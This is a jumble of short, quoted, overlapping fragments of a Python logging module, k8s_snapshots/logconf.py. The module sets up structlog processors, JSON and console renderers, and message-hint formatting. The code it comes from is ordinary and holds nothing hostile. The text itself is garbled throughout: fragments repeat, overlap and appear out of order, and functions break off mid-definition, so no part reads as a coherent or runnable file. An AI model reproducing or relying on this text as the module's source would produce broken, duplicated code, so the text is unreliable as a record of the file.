"serializer=serialize.dumps ) foreign_pre_chain = [ # Add the log level and a timestamp",
"event_dict): event = event_dict.get('event') if event is not None and 'message' not in",
"is None: return value = path_value(ed, key_hint) return format_kv(key_hint, value) def from_key_hints(ed) ->",
"level and a timestamp to the event_dict if the log entry # is",
"for_humans: bool=False, json_indent: Optional[int]=None, level_name: str='INFO' ): key_order = ['message', 'event', 'level'] timestamper",
"\"\"\" Order keys for JSON readability when not using json_log=True \"\"\" def processor(logger,",
"logging_config = { 'version': 1, 'disable_existing_loggers': False, 'formatters': { 'structlog': { '()': structlog.stdlib.ProcessorFormatter,",
"bool=False, json_indent: Optional[int]=None, ): configure_structlog( for_humans=for_humans, json_indent=json_indent, level_name=level_name, ) def configure_structlog( for_humans: bool=False,",
"} } logging.config.dictConfig(logging_config) structlog.configure( processors=processors, context_class=OrderedDict, logger_factory=structlog.stdlib.LoggerFactory(), wrapper_class=structlog.stdlib.BoundLogger, cache_logger_on_first_use=True, ) def foreign_event_to_message(logger, method_name,",
"= ['message', 'event', 'level'] timestamper = structlog.processors.TimeStamper(fmt='ISO') processors = [ event_enum_to_str, ProcessStructuredErrors(), structlog.stdlib.add_logger_name,",
"json_indent: Optional[int]=None, ): configure_structlog( for_humans=for_humans, json_indent=json_indent, level_name=level_name, ) def configure_structlog( for_humans: bool=False, json_indent:",
"method_name, event_dict): if not isinstance(event_dict, OrderedDict): return event_dict for key in reversed(order): if",
"'': { 'handlers': ['default'], 'level': root_logger_level, 'propagate': True, }, 'k8s_snapshots': { 'level': 'DEBUG',",
"rename_level_to_severity(logger, method_name, event_dict): level = event_dict.pop('level', None) event_dict['severity'] = level.upper() return event_dict def",
"None) message = event_dict.get('message') if message is not None: message = f'{prefix}: {message},",
"<filename>k8s_snapshots/logconf.py<gh_stars>100-1000 import logging import logging.config from collections import OrderedDict from typing import Optional,",
"pass def __call__(self, logger, method_name, event_dict): exc_info = event_dict.pop('exc_info', None) if exc_info is",
"is None: return event_dict exc_type, exc, exc_tb = structlog.processors._figure_out_exc_info( exc_info) __structlog__ = getattr(exc,",
"logger_factory=structlog.stdlib.LoggerFactory(), wrapper_class=structlog.stdlib.BoundLogger, cache_logger_on_first_use=True, ) def foreign_event_to_message(logger, method_name, event_dict): event = event_dict.get('event') if event",
"level_name=level_name, ) def configure_structlog( for_humans: bool=False, json_indent: Optional[int]=None, level_name: str='INFO' ): key_order =",
"sys.stdout, 'formatter': 'structlog', }, }, 'loggers': { '': { 'handlers': ['default'], 'level': root_logger_level,",
"if event is not None and 'message' not in event_dict: event_dict['message'] = event",
"event_dict['structured_error'] = structured_error return event_dict def add_message(logger, method_name, event_dict): \"\"\" Creates a ``message``",
"indent=indent, serializer=serialize.dumps ) foreign_pre_chain = [ # Add the log level and a",
"= record.funcName return event_dict def order_keys(order): \"\"\" Order keys for JSON readability when",
"from_key_hints(event_dict) if all(hint is None for hint in hints): if event_dict.get('message') is None:",
"from typing import Optional, List, Any, Dict import structlog import sys from k8s_snapshots",
"return format_kv(key_hint, value) def from_key_hints(ed) -> List[str]: key_hints = ed.pop('key_hints', None) if key_hints",
"hints = [ from_hint(event_dict), from_key_hint(event_dict) ] hints += from_key_hints(event_dict) if all(hint is None",
"import Optional, List, Any, Dict import structlog import sys from k8s_snapshots import serialize",
"message return event_dict def configure_from_config(config): configure_logging( level_name=config['log_level'], for_humans=not config['json_log'], json_indent=config['structlog_json_indent'] or None, )",
"configure_logging( level_name=config['log_level'], for_humans=not config['json_log'], json_indent=config['structlog_json_indent'] or None, ) def configure_logging( level_name: str='INFO', for_humans:",
"__structlog__ = getattr(exc, '__structlog__', None) if not callable(__structlog__): event_dict['exc_info'] = exc_info return event_dict",
"OrderedDict): return event_dict for key in reversed(order): if key in event_dict: event_dict.move_to_end(key, last=False)",
"def configure_from_config(config): configure_logging( level_name=config['log_level'], for_humans=not config['json_log'], json_indent=config['structlog_json_indent'] or None, ) def configure_logging( level_name:",
"event_dict): \"\"\" Creates a ``message`` value based on the ``hint`` and ``key_hint`` keys.",
"key_hints is None: return [] return [ format_kv(key_hint, path_value(ed, key_hint)) for key_hint in",
"}, 'handlers': { 'default': { 'level': level_name, 'class': 'logging.StreamHandler', 'stream': sys.stdout, 'formatter': 'structlog',",
"1, 'disable_existing_loggers': False, 'formatters': { 'structlog': { '()': structlog.stdlib.ProcessorFormatter, 'processor': renderer, 'foreign_pre_chain': foreign_pre_chain,",
"exc_info = event_dict.pop('exc_info', None) if exc_info is None: return event_dict exc_type, exc, exc_tb",
"None: return try: return hint.format(**event_dict) except Exception as exc: return f'! error formatting",
"foreign_event_to_message(logger, method_name, event_dict): event = event_dict.get('event') if event is not None and 'message'",
"processor(logger, method_name, event_dict): if not isinstance(event_dict, OrderedDict): return event_dict for key in reversed(order):",
"record.funcName return event_dict def order_keys(order): \"\"\" Order keys for JSON readability when not",
"'event', 'level'] timestamper = structlog.processors.TimeStamper(fmt='ISO') processors = [ event_enum_to_str, ProcessStructuredErrors(), structlog.stdlib.add_logger_name, structlog.stdlib.add_log_level, rename_level_to_severity,",
"if exc_info is None: return event_dict exc_type, exc, exc_tb = structlog.processors._figure_out_exc_info( exc_info) __structlog__",
"record = event_dict.get('_record') if record is None: return event_dict event_dict['function'] = record.funcName return",
"return f'{key}={serialize.process(value)}' hints = [ from_hint(event_dict), from_key_hint(event_dict) ] hints += from_key_hints(event_dict) if all(hint",
"configure_structlog( for_humans: bool=False, json_indent: Optional[int]=None, level_name: str='INFO' ): key_order = ['message', 'event', 'level']",
"format_kv(key_hint, value) def from_key_hints(ed) -> List[str]: key_hints = ed.pop('key_hints', None) if key_hints is",
"``hint`` and ``key_hint`` keys. ``key_hint`` : ``Optional[str]`` a '.'-separated path of dictionary keys.",
"for key_hint in key_hints ] def format_kv(key: str, value: Any) -> str: return",
"return value def from_key_hint(ed) -> Optional[str]: key_hint = ed.pop('key_hint', None) if key_hint is",
") def configure_structlog( for_humans: bool=False, json_indent: Optional[int]=None, level_name: str='INFO' ): key_order = ['message',",
"ed.pop('key_hint', None) if key_hint is None: return value = path_value(ed, key_hint) return format_kv(key_hint,",
"level_name == 'DEBUG': root_logger_level = 'DEBUG' else: root_logger_level = 'ERROR' logging_config = {",
"key_hint) return format_kv(key_hint, value) def from_key_hints(ed) -> List[str]: key_hints = ed.pop('key_hints', None) if",
"foreign_pre_chain = [ # Add the log level and a timestamp to the",
"be formatted using ``.format(**event_dict)``. \"\"\" def from_hint(ed): hint = event_dict.pop('hint', None) if hint",
": ``Optional[str]`` a '.'-separated path of dictionary keys. ``hint`` : ``Optional[str]`` will be",
"from structlog. structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, structlog.stdlib.add_log_level, structlog.stdlib.add_logger_name, foreign_event_to_message, rename_level_to_severity, timestamper, ] if level_name ==",
"Make it so that 0 ⇒ None indent = json_indent or None renderer",
"value.get(key) return value def from_key_hint(ed) -> Optional[str]: key_hint = ed.pop('key_hint', None) if key_hint",
"event_dict.pop('hint', None) if hint is None: return try: return hint.format(**event_dict) except Exception as",
"'handlers': { 'default': { 'level': level_name, 'class': 'logging.StreamHandler', 'stream': sys.stdout, 'formatter': 'structlog', },",
"}, 'loggers': { '': { 'handlers': ['default'], 'level': root_logger_level, 'propagate': True, }, 'k8s_snapshots':",
"return f'! error formatting message: {exc!r}' def path_value(dict_: Dict[str, Any], key_path: str) ->",
"using ``.format(**event_dict)``. \"\"\" def from_hint(ed): hint = event_dict.pop('hint', None) if hint is None:",
"event_dict['message'] = event_dict.get('event') return event_dict prefix = event_dict['event'] hint = ', '.join(hint for",
"exc, exc_tb = structlog.processors._figure_out_exc_info( exc_info) __structlog__ = getattr(exc, '__structlog__', None) if not callable(__structlog__):",
"key_path.split('.'): if value is None: return __structlog__ = getattr(value, '__structlog__', None) if __structlog__",
"'disable_existing_loggers': False, 'formatters': { 'structlog': { '()': structlog.stdlib.ProcessorFormatter, 'processor': renderer, 'foreign_pre_chain': foreign_pre_chain, },",
"configure_logging( level_name: str='INFO', for_humans: bool=False, json_indent: Optional[int]=None, ): configure_structlog( for_humans=for_humans, json_indent=json_indent, level_name=level_name, )",
"return event_dict return processor def event_enum_to_str(logger, method_name, event_dict): from k8s_snapshots import events event",
"readability when not using json_log=True \"\"\" def processor(logger, method_name, event_dict): if not isinstance(event_dict,",
"structured_error return event_dict def add_message(logger, method_name, event_dict): \"\"\" Creates a ``message`` value based",
"Add the log level and a timestamp to the event_dict if the log",
"Any], key_path: str) -> Optional[Any]: value = dict_ for key in key_path.split('.'): if",
"processors = [ event_enum_to_str, ProcessStructuredErrors(), structlog.stdlib.add_logger_name, structlog.stdlib.add_log_level, rename_level_to_severity, timestamper, structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, add_func_name, add_message,",
"structured_error = __structlog__() event_dict['structured_error'] = structured_error return event_dict def add_message(logger, method_name, event_dict): \"\"\"",
"{hint}' else: message = f'{prefix}: {hint}' event_dict['message'] = message return event_dict def configure_from_config(config):",
"', '.join(hint for hint in hints if hint is not None) message =",
"event_dict['severity'] = level.upper() return event_dict def add_func_name(logger, method_rame, event_dict): record = event_dict.get('_record') if",
"event = event_dict.get('event') if event is None: return event_dict if isinstance(event, events.EventEnum): event_dict['event']",
"event_dict prefix = event_dict['event'] hint = ', '.join(hint for hint in hints if",
"True, }, 'k8s_snapshots': { 'level': 'DEBUG', } } } logging.config.dictConfig(logging_config) structlog.configure( processors=processors, context_class=OrderedDict,",
"'handlers': ['default'], 'level': root_logger_level, 'propagate': True, }, 'k8s_snapshots': { 'level': 'DEBUG', } }",
"not None and 'message' not in event_dict: event_dict['message'] = event event_dict['event'] = 'foreign'",
"= 'foreign' return event_dict def rename_level_to_severity(logger, method_name, event_dict): level = event_dict.pop('level', None) event_dict['severity']",
"'level': root_logger_level, 'propagate': True, }, 'k8s_snapshots': { 'level': 'DEBUG', } } } logging.config.dictConfig(logging_config)",
"None and 'message' not in event_dict: event_dict['message'] = event event_dict['event'] = 'foreign' return",
"structlog.stdlib.ProcessorFormatter, 'processor': renderer, 'foreign_pre_chain': foreign_pre_chain, }, }, 'handlers': { 'default': { 'level': level_name,",
"return event_dict exc_type, exc, exc_tb = structlog.processors._figure_out_exc_info( exc_info) __structlog__ = getattr(exc, '__structlog__', None)",
") def configure_logging( level_name: str='INFO', for_humans: bool=False, json_indent: Optional[int]=None, ): configure_structlog( for_humans=for_humans, json_indent=json_indent,",
"renderer = structlog.dev.ConsoleRenderer() # <=== else: # Make it so that 0 ⇒",
"exc_tb = structlog.processors._figure_out_exc_info( exc_info) __structlog__ = getattr(exc, '__structlog__', None) if not callable(__structlog__): event_dict['exc_info']",
"value = dict_ for key in key_path.split('.'): if value is None: return __structlog__",
"{ '()': structlog.stdlib.ProcessorFormatter, 'processor': renderer, 'foreign_pre_chain': foreign_pre_chain, }, }, 'handlers': { 'default': {",
"hint is None: return try: return hint.format(**event_dict) except Exception as exc: return f'!",
"None for hint in hints): if event_dict.get('message') is None: event_dict['message'] = event_dict.get('event') return",
"= f'{prefix}: {hint}' event_dict['message'] = message return event_dict def configure_from_config(config): configure_logging( level_name=config['log_level'], for_humans=not",
"event_dict if the log entry # is not from structlog. structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, structlog.stdlib.add_log_level,",
"is not from structlog. structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, structlog.stdlib.add_log_level, structlog.stdlib.add_logger_name, foreign_event_to_message, rename_level_to_severity, timestamper, ] if",
"not from structlog. structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, structlog.stdlib.add_log_level, structlog.stdlib.add_logger_name, foreign_event_to_message, rename_level_to_severity, timestamper, ] if level_name",
"event_dict def add_func_name(logger, method_rame, event_dict): record = event_dict.get('_record') if record is None: return",
"event_dict event_dict['function'] = record.funcName return event_dict def order_keys(order): \"\"\" Order keys for JSON",
"hints if hint is not None) message = event_dict.get('message') if message is not",
"{ 'level': level_name, 'class': 'logging.StreamHandler', 'stream': sys.stdout, 'formatter': 'structlog', }, }, 'loggers': {",
"key in key_path.split('.'): if value is None: return __structlog__ = getattr(value, '__structlog__', None)",
"Optional[int]=None, level_name: str='INFO' ): key_order = ['message', 'event', 'level'] timestamper = structlog.processors.TimeStamper(fmt='ISO') processors",
"event is not None and 'message' not in event_dict: event_dict['message'] = event event_dict['event']",
"OrderedDict from typing import Optional, List, Any, Dict import structlog import sys from",
"{ 'structlog': { '()': structlog.stdlib.ProcessorFormatter, 'processor': renderer, 'foreign_pre_chain': foreign_pre_chain, }, }, 'handlers': {",
"or None, ) def configure_logging( level_name: str='INFO', for_humans: bool=False, json_indent: Optional[int]=None, ): configure_structlog(",
"None: return __structlog__ = getattr(value, '__structlog__', None) if __structlog__ is not None: value",
"and a timestamp to the event_dict if the log entry # is not",
"is None: return __structlog__ = getattr(value, '__structlog__', None) if __structlog__ is not None:",
"format_kv(key: str, value: Any) -> str: return f'{key}={serialize.process(value)}' hints = [ from_hint(event_dict), from_key_hint(event_dict)",
"structlog.stdlib.add_logger_name, structlog.stdlib.add_log_level, rename_level_to_severity, timestamper, structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, add_func_name, add_message, order_keys(key_order), structlog.stdlib.ProcessorFormatter.wrap_for_formatter, ] if for_humans:",
"'logging.StreamHandler', 'stream': sys.stdout, 'formatter': 'structlog', }, }, 'loggers': { '': { 'handlers': ['default'],",
"configure_from_config(config): configure_logging( level_name=config['log_level'], for_humans=not config['json_log'], json_indent=config['structlog_json_indent'] or None, ) def configure_logging( level_name: str='INFO',",
"'structlog': { '()': structlog.stdlib.ProcessorFormatter, 'processor': renderer, 'foreign_pre_chain': foreign_pre_chain, }, }, 'handlers': { 'default':",
"event = event_dict.get('event') if event is not None and 'message' not in event_dict:",
"event_dict['message'] = event event_dict['event'] = 'foreign' return event_dict def rename_level_to_severity(logger, method_name, event_dict): level",
"def from_key_hints(ed) -> List[str]: key_hints = ed.pop('key_hints', None) if key_hints is None: return",
"last=False) return event_dict return processor def event_enum_to_str(logger, method_name, event_dict): from k8s_snapshots import events",
"event_dict.get('message') is None: event_dict['message'] = event_dict.get('event') return event_dict prefix = event_dict['event'] hint =",
"record is None: return event_dict event_dict['function'] = record.funcName return event_dict def order_keys(order): \"\"\"",
"= structlog.processors.JSONRenderer( indent=indent, serializer=serialize.dumps ) foreign_pre_chain = [ # Add the log level",
"event_dict['event'] = 'foreign' return event_dict def rename_level_to_severity(logger, method_name, event_dict): level = event_dict.pop('level', None)",
"if for_humans: renderer = structlog.dev.ConsoleRenderer() # <=== else: # Make it so that",
"event event_dict['event'] = 'foreign' return event_dict def rename_level_to_severity(logger, method_name, event_dict): level = event_dict.pop('level',",
"ProcessStructuredErrors: def __init__(self): pass def __call__(self, logger, method_name, event_dict): exc_info = event_dict.pop('exc_info', None)",
"'.'-separated path of dictionary keys. ``hint`` : ``Optional[str]`` will be formatted using ``.format(**event_dict)``.",
"None indent = json_indent or None renderer = structlog.processors.JSONRenderer( indent=indent, serializer=serialize.dumps ) foreign_pre_chain",
"= event event_dict['event'] = 'foreign' return event_dict def rename_level_to_severity(logger, method_name, event_dict): level =",
"not None: message = f'{prefix}: {message}, {hint}' else: message = f'{prefix}: {hint}' event_dict['message']",
"Dict import structlog import sys from k8s_snapshots import serialize class ProcessStructuredErrors: def __init__(self):",
"exc_type, exc, exc_tb = structlog.processors._figure_out_exc_info( exc_info) __structlog__ = getattr(exc, '__structlog__', None) if not",
"List[str]: key_hints = ed.pop('key_hints', None) if key_hints is None: return [] return [",
"event_dict for key in reversed(order): if key in event_dict: event_dict.move_to_end(key, last=False) return event_dict",
"path of dictionary keys. ``hint`` : ``Optional[str]`` will be formatted using ``.format(**event_dict)``. \"\"\"",
"root_logger_level, 'propagate': True, }, 'k8s_snapshots': { 'level': 'DEBUG', } } } logging.config.dictConfig(logging_config) structlog.configure(",
"None: message = f'{prefix}: {message}, {hint}' else: message = f'{prefix}: {hint}' event_dict['message'] =",
"message = f'{prefix}: {message}, {hint}' else: message = f'{prefix}: {hint}' event_dict['message'] = message",
"event_dict def configure_from_config(config): configure_logging( level_name=config['log_level'], for_humans=not config['json_log'], json_indent=config['structlog_json_indent'] or None, ) def configure_logging(",
"event_dict def rename_level_to_severity(logger, method_name, event_dict): level = event_dict.pop('level', None) event_dict['severity'] = level.upper() return",
"isinstance(event_dict, OrderedDict): return event_dict for key in reversed(order): if key in event_dict: event_dict.move_to_end(key,",
"event_dict.get('event') if event is None: return event_dict if isinstance(event, events.EventEnum): event_dict['event'] = event.value",
"json_indent or None renderer = structlog.processors.JSONRenderer( indent=indent, serializer=serialize.dumps ) foreign_pre_chain = [ #",
"'default': { 'level': level_name, 'class': 'logging.StreamHandler', 'stream': sys.stdout, 'formatter': 'structlog', }, }, 'loggers':",
"key_hint)) for key_hint in key_hints ] def format_kv(key: str, value: Any) -> str:",
"ed.pop('key_hints', None) if key_hints is None: return [] return [ format_kv(key_hint, path_value(ed, key_hint))",
"add_func_name(logger, method_rame, event_dict): record = event_dict.get('_record') if record is None: return event_dict event_dict['function']",
"foreign_event_to_message, rename_level_to_severity, timestamper, ] if level_name == 'DEBUG': root_logger_level = 'DEBUG' else: root_logger_level",
"event_dict.pop('exc_info', None) if exc_info is None: return event_dict exc_type, exc, exc_tb = structlog.processors._figure_out_exc_info(",
"event_dict): exc_info = event_dict.pop('exc_info', None) if exc_info is None: return event_dict exc_type, exc,",
"None) if exc_info is None: return event_dict exc_type, exc, exc_tb = structlog.processors._figure_out_exc_info( exc_info)",
"None) if not callable(__structlog__): event_dict['exc_info'] = exc_info return event_dict structured_error = __structlog__() event_dict['structured_error']",
"= event_dict.pop('exc_info', None) if exc_info is None: return event_dict exc_type, exc, exc_tb =",
"'level'] timestamper = structlog.processors.TimeStamper(fmt='ISO') processors = [ event_enum_to_str, ProcessStructuredErrors(), structlog.stdlib.add_logger_name, structlog.stdlib.add_log_level, rename_level_to_severity, timestamper,",
"renderer = structlog.processors.JSONRenderer( indent=indent, serializer=serialize.dumps ) foreign_pre_chain = [ # Add the log",
"context_class=OrderedDict, logger_factory=structlog.stdlib.LoggerFactory(), wrapper_class=structlog.stdlib.BoundLogger, cache_logger_on_first_use=True, ) def foreign_event_to_message(logger, method_name, event_dict): event = event_dict.get('event') if",
"None) if __structlog__ is not None: value = __structlog__() value = value.get(key) return",
"= level.upper() return event_dict def add_func_name(logger, method_rame, event_dict): record = event_dict.get('_record') if record",
"def order_keys(order): \"\"\" Order keys for JSON readability when not using json_log=True \"\"\"",
"the log entry # is not from structlog. structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, structlog.stdlib.add_log_level, structlog.stdlib.add_logger_name, foreign_event_to_message,",
"event_dict structured_error = __structlog__() event_dict['structured_error'] = structured_error return event_dict def add_message(logger, method_name, event_dict):",
"event_dict: event_dict['message'] = event event_dict['event'] = 'foreign' return event_dict def rename_level_to_severity(logger, method_name, event_dict):",
"def rename_level_to_severity(logger, method_name, event_dict): level = event_dict.pop('level', None) event_dict['severity'] = level.upper() return event_dict",
"\"\"\" Creates a ``message`` value based on the ``hint`` and ``key_hint`` keys. ``key_hint``",
"] def format_kv(key: str, value: Any) -> str: return f'{key}={serialize.process(value)}' hints = [",
"structlog.stdlib.add_logger_name, foreign_event_to_message, rename_level_to_severity, timestamper, ] if level_name == 'DEBUG': root_logger_level = 'DEBUG' else:",
"so that 0 ⇒ None indent = json_indent or None renderer = structlog.processors.JSONRenderer(",
"{ 'level': 'DEBUG', } } } logging.config.dictConfig(logging_config) structlog.configure( processors=processors, context_class=OrderedDict, logger_factory=structlog.stdlib.LoggerFactory(), wrapper_class=structlog.stdlib.BoundLogger, cache_logger_on_first_use=True,",
"} logging.config.dictConfig(logging_config) structlog.configure( processors=processors, context_class=OrderedDict, logger_factory=structlog.stdlib.LoggerFactory(), wrapper_class=structlog.stdlib.BoundLogger, cache_logger_on_first_use=True, ) def foreign_event_to_message(logger, method_name, event_dict):",
"'loggers': { '': { 'handlers': ['default'], 'level': root_logger_level, 'propagate': True, }, 'k8s_snapshots': {",
"List, Any, Dict import structlog import sys from k8s_snapshots import serialize class ProcessStructuredErrors:",
"= ed.pop('key_hints', None) if key_hints is None: return [] return [ format_kv(key_hint, path_value(ed,",
"if __structlog__ is not None: value = __structlog__() value = value.get(key) return value",
"level_name, 'class': 'logging.StreamHandler', 'stream': sys.stdout, 'formatter': 'structlog', }, }, 'loggers': { '': {",
"message: {exc!r}' def path_value(dict_: Dict[str, Any], key_path: str) -> Optional[Any]: value = dict_",
"str='INFO' ): key_order = ['message', 'event', 'level'] timestamper = structlog.processors.TimeStamper(fmt='ISO') processors = [",
"value) def from_key_hints(ed) -> List[str]: key_hints = ed.pop('key_hints', None) if key_hints is None:",
"'ERROR' logging_config = { 'version': 1, 'disable_existing_loggers': False, 'formatters': { 'structlog': { '()':",
"__call__(self, logger, method_name, event_dict): exc_info = event_dict.pop('exc_info', None) if exc_info is None: return",
"key_order = ['message', 'event', 'level'] timestamper = structlog.processors.TimeStamper(fmt='ISO') processors = [ event_enum_to_str, ProcessStructuredErrors(),",
"__structlog__ = getattr(value, '__structlog__', None) if __structlog__ is not None: value = __structlog__()",
"def from_key_hint(ed) -> Optional[str]: key_hint = ed.pop('key_hint', None) if key_hint is None: return",
"'DEBUG' else: root_logger_level = 'ERROR' logging_config = { 'version': 1, 'disable_existing_loggers': False, 'formatters':",
"if level_name == 'DEBUG': root_logger_level = 'DEBUG' else: root_logger_level = 'ERROR' logging_config =",
"else: root_logger_level = 'ERROR' logging_config = { 'version': 1, 'disable_existing_loggers': False, 'formatters': {",
"if record is None: return event_dict event_dict['function'] = record.funcName return event_dict def order_keys(order):",
"None: return event_dict event_dict['function'] = record.funcName return event_dict def order_keys(order): \"\"\" Order keys",
"'processor': renderer, 'foreign_pre_chain': foreign_pre_chain, }, }, 'handlers': { 'default': { 'level': level_name, 'class':",
"None: return value = path_value(ed, key_hint) return format_kv(key_hint, value) def from_key_hints(ed) -> List[str]:",
"event_dict exc_type, exc, exc_tb = structlog.processors._figure_out_exc_info( exc_info) __structlog__ = getattr(exc, '__structlog__', None) if",
"a '.'-separated path of dictionary keys. ``hint`` : ``Optional[str]`` will be formatted using",
"``key_hint`` : ``Optional[str]`` a '.'-separated path of dictionary keys. ``hint`` : ``Optional[str]`` will",
"Exception as exc: return f'! error formatting message: {exc!r}' def path_value(dict_: Dict[str, Any],",
"event_dict.get('event') return event_dict prefix = event_dict['event'] hint = ', '.join(hint for hint in",
"json_indent=json_indent, level_name=level_name, ) def configure_structlog( for_humans: bool=False, json_indent: Optional[int]=None, level_name: str='INFO' ): key_order",
"None) if hint is None: return try: return hint.format(**event_dict) except Exception as exc:",
"structlog import sys from k8s_snapshots import serialize class ProcessStructuredErrors: def __init__(self): pass def",
"if hint is not None) message = event_dict.get('message') if message is not None:",
"Optional[int]=None, ): configure_structlog( for_humans=for_humans, json_indent=json_indent, level_name=level_name, ) def configure_structlog( for_humans: bool=False, json_indent: Optional[int]=None,",
"not None) message = event_dict.get('message') if message is not None: message = f'{prefix}:",
"__structlog__() event_dict['structured_error'] = structured_error return event_dict def add_message(logger, method_name, event_dict): \"\"\" Creates a",
"for_humans=not config['json_log'], json_indent=config['structlog_json_indent'] or None, ) def configure_logging( level_name: str='INFO', for_humans: bool=False, json_indent:",
"key_hint = ed.pop('key_hint', None) if key_hint is None: return value = path_value(ed, key_hint)",
"None) event_dict['severity'] = level.upper() return event_dict def add_func_name(logger, method_rame, event_dict): record = event_dict.get('_record')",
"= { 'version': 1, 'disable_existing_loggers': False, 'formatters': { 'structlog': { '()': structlog.stdlib.ProcessorFormatter, 'processor':",
"= event_dict.get('event') if event is None: return event_dict if isinstance(event, events.EventEnum): event_dict['event'] =",
"keys. ``key_hint`` : ``Optional[str]`` a '.'-separated path of dictionary keys. ``hint`` : ``Optional[str]``",
"and 'message' not in event_dict: event_dict['message'] = event event_dict['event'] = 'foreign' return event_dict",
"= [ from_hint(event_dict), from_key_hint(event_dict) ] hints += from_key_hints(event_dict) if all(hint is None for",
"<=== else: # Make it so that 0 ⇒ None indent = json_indent",
"None: return event_dict exc_type, exc, exc_tb = structlog.processors._figure_out_exc_info( exc_info) __structlog__ = getattr(exc, '__structlog__',",
"\"\"\" def from_hint(ed): hint = event_dict.pop('hint', None) if hint is None: return try:",
"``key_hint`` keys. ``key_hint`` : ``Optional[str]`` a '.'-separated path of dictionary keys. ``hint`` :",
"f'! error formatting message: {exc!r}' def path_value(dict_: Dict[str, Any], key_path: str) -> Optional[Any]:",
"Any) -> str: return f'{key}={serialize.process(value)}' hints = [ from_hint(event_dict), from_key_hint(event_dict) ] hints +=",
"ProcessStructuredErrors(), structlog.stdlib.add_logger_name, structlog.stdlib.add_log_level, rename_level_to_severity, timestamper, structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, add_func_name, add_message, order_keys(key_order), structlog.stdlib.ProcessorFormatter.wrap_for_formatter, ] if",
"dict_ for key in key_path.split('.'): if value is None: return __structlog__ = getattr(value,",
"def processor(logger, method_name, event_dict): if not isinstance(event_dict, OrderedDict): return event_dict for key in",
"that 0 ⇒ None indent = json_indent or None renderer = structlog.processors.JSONRenderer( indent=indent,",
"JSON readability when not using json_log=True \"\"\" def processor(logger, method_name, event_dict): if not",
"'DEBUG', } } } logging.config.dictConfig(logging_config) structlog.configure( processors=processors, context_class=OrderedDict, logger_factory=structlog.stdlib.LoggerFactory(), wrapper_class=structlog.stdlib.BoundLogger, cache_logger_on_first_use=True, ) def",
"= 'ERROR' logging_config = { 'version': 1, 'disable_existing_loggers': False, 'formatters': { 'structlog': {",
"logging.config from collections import OrderedDict from typing import Optional, List, Any, Dict import",
"if hint is None: return try: return hint.format(**event_dict) except Exception as exc: return",
"key_hints ] def format_kv(key: str, value: Any) -> str: return f'{key}={serialize.process(value)}' hints =",
"event_dict def add_message(logger, method_name, event_dict): \"\"\" Creates a ``message`` value based on the",
": ``Optional[str]`` will be formatted using ``.format(**event_dict)``. \"\"\" def from_hint(ed): hint = event_dict.pop('hint',",
"'k8s_snapshots': { 'level': 'DEBUG', } } } logging.config.dictConfig(logging_config) structlog.configure( processors=processors, context_class=OrderedDict, logger_factory=structlog.stdlib.LoggerFactory(), wrapper_class=structlog.stdlib.BoundLogger,",
"foreign_pre_chain, }, }, 'handlers': { 'default': { 'level': level_name, 'class': 'logging.StreamHandler', 'stream': sys.stdout,",
"return event_dict prefix = event_dict['event'] hint = ', '.join(hint for hint in hints",
"for key in key_path.split('.'): if value is None: return __structlog__ = getattr(value, '__structlog__',",
"event_dict: event_dict.move_to_end(key, last=False) return event_dict return processor def event_enum_to_str(logger, method_name, event_dict): from k8s_snapshots",
"to the event_dict if the log entry # is not from structlog. structlog.processors.StackInfoRenderer(),",
"event is None: return event_dict if isinstance(event, events.EventEnum): event_dict['event'] = event.value return event_dict",
"of dictionary keys. ``hint`` : ``Optional[str]`` will be formatted using ``.format(**event_dict)``. \"\"\" def",
"value is None: return __structlog__ = getattr(value, '__structlog__', None) if __structlog__ is not",
"structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, add_func_name, add_message, order_keys(key_order), structlog.stdlib.ProcessorFormatter.wrap_for_formatter, ] if for_humans: renderer = structlog.dev.ConsoleRenderer() #",
"value based on the ``hint`` and ``key_hint`` keys. ``key_hint`` : ``Optional[str]`` a '.'-separated",
"from collections import OrderedDict from typing import Optional, List, Any, Dict import structlog",
"if key_hints is None: return [] return [ format_kv(key_hint, path_value(ed, key_hint)) for key_hint",
"from_key_hints(ed) -> List[str]: key_hints = ed.pop('key_hints', None) if key_hints is None: return []",
"{ '': { 'handlers': ['default'], 'level': root_logger_level, 'propagate': True, }, 'k8s_snapshots': { 'level':",
"entry # is not from structlog. structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, structlog.stdlib.add_log_level, structlog.stdlib.add_logger_name, foreign_event_to_message, rename_level_to_severity, timestamper,",
"for_humans: bool=False, json_indent: Optional[int]=None, ): configure_structlog( for_humans=for_humans, json_indent=json_indent, level_name=level_name, ) def configure_structlog( for_humans:",
"collections import OrderedDict from typing import Optional, List, Any, Dict import structlog import",
"logging import logging.config from collections import OrderedDict from typing import Optional, List, Any,",
"def add_message(logger, method_name, event_dict): \"\"\" Creates a ``message`` value based on the ``hint``",
"typing import Optional, List, Any, Dict import structlog import sys from k8s_snapshots import",
"return hint.format(**event_dict) except Exception as exc: return f'! error formatting message: {exc!r}' def",
"event_dict['exc_info'] = exc_info return event_dict structured_error = __structlog__() event_dict['structured_error'] = structured_error return event_dict",
"or None renderer = structlog.processors.JSONRenderer( indent=indent, serializer=serialize.dumps ) foreign_pre_chain = [ # Add",
"'version': 1, 'disable_existing_loggers': False, 'formatters': { 'structlog': { '()': structlog.stdlib.ProcessorFormatter, 'processor': renderer, 'foreign_pre_chain':",
"= structured_error return event_dict def add_message(logger, method_name, event_dict): \"\"\" Creates a ``message`` value",
"= __structlog__() value = value.get(key) return value def from_key_hint(ed) -> Optional[str]: key_hint =",
"'foreign' return event_dict def rename_level_to_severity(logger, method_name, event_dict): level = event_dict.pop('level', None) event_dict['severity'] =",
"from k8s_snapshots import serialize class ProcessStructuredErrors: def __init__(self): pass def __call__(self, logger, method_name,",
"reversed(order): if key in event_dict: event_dict.move_to_end(key, last=False) return event_dict return processor def event_enum_to_str(logger,",
"if event_dict.get('message') is None: event_dict['message'] = event_dict.get('event') return event_dict prefix = event_dict['event'] hint",
"except Exception as exc: return f'! error formatting message: {exc!r}' def path_value(dict_: Dict[str,",
"hints): if event_dict.get('message') is None: event_dict['message'] = event_dict.get('event') return event_dict prefix = event_dict['event']",
